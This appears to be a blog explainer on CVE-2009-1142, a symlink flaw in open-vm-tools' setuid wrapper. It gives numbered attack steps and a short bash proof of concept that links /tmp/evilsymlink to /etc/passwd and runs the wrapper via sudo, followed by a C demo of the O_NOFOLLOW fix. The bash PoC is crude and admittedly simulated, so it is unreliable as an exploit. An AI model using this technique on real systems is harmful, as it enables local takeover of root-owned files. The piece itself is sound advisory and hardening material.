Open-vm-tools is an open source implementation of VMware Tools, widely used on Linux virtual machines running in VMware environments. In March 2009, a highly critical vulnerability was discovered in open-vm-tools (specifically version 2009.03.18-154848) which could allow local users to escalate privileges to root by exploiting a flaw in the handling of temporary files.
In this long-read post, we’ll break down CVE-2009-1142 in plain English, explain the mechanics of the bug, show you a code snippet that demonstrates the vulnerability, provide links to original advisories, and walk you through how exploitation works. All content here is exclusive and simplified.
What Was the Problem?
At its core, the vulnerability revolves around how vmware-user-suid-wrapper, a setuid-root binary (meaning it runs with root privileges), handled temporary files. Specifically, when a feature called ChmodChownDirectory was enabled, the wrapper would create or modify files in /tmp with insecure logic.
Since /tmp is world-writable, an attacker can plant a symbolic link (symlink) there that points at a critical system file. If the vulnerable program blindly follows that symlink, it changes the permissions or ownership of whatever file the link points to, even a file owned by root, rather than of the link itself. This is known as a "symlink attack."
Insecure Behavior: ChmodChownDirectory
The feature ChmodChownDirectory is enabled in some configurations of open-vm-tools and is supposed to manage some user file permissions in the guest VM. But, the program doesn’t check if the files in /tmp are symlinks before changing ownership or permissions, which is a major oversight.
The Attack: Step-By-Step
1. Attacker creates a malicious symlink in /tmp that points to a privileged file (say, /etc/passwd or any root-owned file).
2. Attacker runs the vulnerable vmware-user-suid-wrapper binary (which is setuid root).
3. The program follows the symlink and runs chown/chmod on the *target* file, not the symlink itself, changing its ownership or permissions.
4. Attacker now owns or controls the permissions of a privileged file, essentially escalating their own privileges on the system.
Demonstration Code
Below is a simple proof-of-concept (PoC) in bash that demonstrates the vuln (for research only — never run on production systems!):
#!/bin/bash
# CVE-2009-1142 Symlink Vulnerability PoC
TARGET="/etc/passwd"
LINK="/tmp/evilsymlink"
# Remove pre-existing symlink or file
rm -f "$LINK"
# Create malicious symlink
ln -s "$TARGET" "$LINK"
echo "[*] Malicious symlink created: $LINK --> $TARGET"
echo "[*] Now running vulnerable vmware-user-suid-wrapper (must be setuid root!)"
# The following triggers the vulnerability:
# (simulate as if this was called by vmware-user-suid-wrapper internally)
sudo /usr/bin/vmware-user-suid-wrapper
echo "[*] If vulnerable, ownership of $TARGET may have changed!"
ls -l "$TARGET"
If the system is affected and the wrapper is misconfigured, the attacker may "own" /etc/passwd or another critical file — letting them modify it, and thus the system.
Original References
* Secunia Advisory SA34408
* CVE Details for CVE-2009-1142
* Original Bugzilla Report (Red Hat)
* open-vm-tools Security Announcement
Exploit Details Explained
Why was this so dangerous? Because the vmware-user-suid-wrapper binary runs as root, *any* file that the attacker can get the symlink to point to could have its ownership or permissions modified. That means even files that regular users should never be able to touch. Suddenly, the door is opened to all sorts of attacks — from adding a new root user to the system, to running unrestricted code, or even just completely breaking the system by ruining crucial files.
How Was It Patched?
The fix is to have the program open files securely and operate on them only after confirming they are not symlinks (typically by opening with the O_NOFOLLOW flag), and to stop operating unsafely on attacker-controlled directories like /tmp. More recent versions of open-vm-tools have these checks in place.
Best practice: Don’t let setuid root programs write to or change files in /tmp without a lot of care!
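To make the patch concrete, here is an added example in C that is not taken from open-vm-tools. It contrasts the path-based chmod() call that follows symlinks with a hardened version that opens the path with O_NOFOLLOW, verifies via fstat() that it holds a regular file, and then changes the mode through the descriptor (fchown() is the analogous call for ownership). The function names, the scratch directory, and the file names are assumptions made for the demonstration; the scratch directory stands in for /tmp.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable pattern (hypothetical, stands in for what the post describes):
 * chmod()/chown() take a path and resolve symlinks, so a link planted in a
 * world-writable directory redirects the call to whatever it points at. */
int unsafe_chmod(const char *path, mode_t mode)
{
    return chmod(path, mode);
}

/* Hardened pattern: open with O_NOFOLLOW so a symlink is rejected (ELOOP on
 * Linux), verify via fstat() that we hold a regular file, then operate on the
 * descriptor with fchmod(). Checking the descriptor rather than the path also
 * closes the check-then-use race that lstat() followed by chmod(path) leaves. */
int safe_chmod(const char *path, mode_t mode)
{
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NOCTTY);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode)) {
        close(fd);
        errno = EINVAL;
        return -1;
    }
    int rc = fchmod(fd, mode);
    int saved = errno;
    close(fd);
    errno = saved;
    return rc;
}

/* Permission bits of a path, read without following symlinks. */
static mode_t perm_bits(const char *path)
{
    struct stat st;
    if (lstat(path, &st) < 0)
        return (mode_t)-1;
    return st.st_mode & 07777;
}

struct demo_result {
    int unsafe_followed_link;   /* chmod(link) silently changed the target */
    int safe_refused_link;      /* safe_chmod(link) failed, target untouched */
    int safe_worked_on_regular; /* safe_chmod(target) changed the target */
};

/* Build a scratch directory (constructed stand-in for /tmp) holding a regular
 * file and a symlink to it, then exercise both patterns. Returns 0 on a clean run. */
int demo_symlink_handling(struct demo_result *r)
{
    char dir[] = "/tmp/symlink-demo-XXXXXX";
    char fallback[] = "./symlink-demo-XXXXXX";
    char *scratch = mkdtemp(dir) ? dir : mkdtemp(fallback);
    if (!scratch)
        return -1;
    char target[512], linkpath[512];
    snprintf(target, sizeof target, "%s/target", scratch);
    snprintf(linkpath, sizeof linkpath, "%s/evilsymlink", scratch);

    int fd = open(target, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0 || close(fd) < 0 || symlink(target, linkpath) < 0)
        return -1;

    /* 1. Vulnerable: the link is followed and the *target* becomes 0640. */
    unsafe_chmod(linkpath, 0640);
    r->unsafe_followed_link = (perm_bits(target) == 0640);

    /* 2. Hardened: the link is refused and the target keeps its 0640 bits. */
    int rc = safe_chmod(linkpath, 0600);
    r->safe_refused_link = (rc < 0 && perm_bits(target) == 0640);

    /* 3. Hardened call on the real regular file still does its job. */
    r->safe_worked_on_regular =
        (safe_chmod(target, 0600) == 0 && perm_bits(target) == 0600);

    unlink(linkpath);
    unlink(target);
    rmdir(scratch);
    return 0;
}

int main(void)
{
    struct demo_result r;
    if (demo_symlink_handling(&r) < 0) {
        perror("demo");
        return 1;
    }
    printf("chmod(path) followed the symlink:      %s\n", r.unsafe_followed_link ? "yes" : "no");
    printf("safe_chmod refused the symlink:        %s\n", r.safe_refused_link ? "yes" : "no");
    printf("safe_chmod worked on the regular file: %s\n", r.safe_worked_on_regular ? "yes" : "no");
    return 0;
}
```

Running it as an ordinary user is enough to see the difference: the path-based call changes the target's mode through the link, while the hardened call fails on the link and leaves the target alone. In a setuid-root program the same O_NOFOLLOW plus fstat() plus fchmod()/fchown() sequence is what turns the /tmp symlink from a root-level write primitive into a harmless error.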
Final Thoughts
Vulnerabilities like CVE-2009-1142 highlight just how dangerous lazy temp file handling can be, especially for software that runs as root. If you’re still running older open-vm-tools, upgrade immediately. And if you’re a developer, remember: never trust /tmp!
Timeline
Published on: 11/23/2022 18:15:00 UTC
Last modified on: 11/28/2022 18:33:00 UTC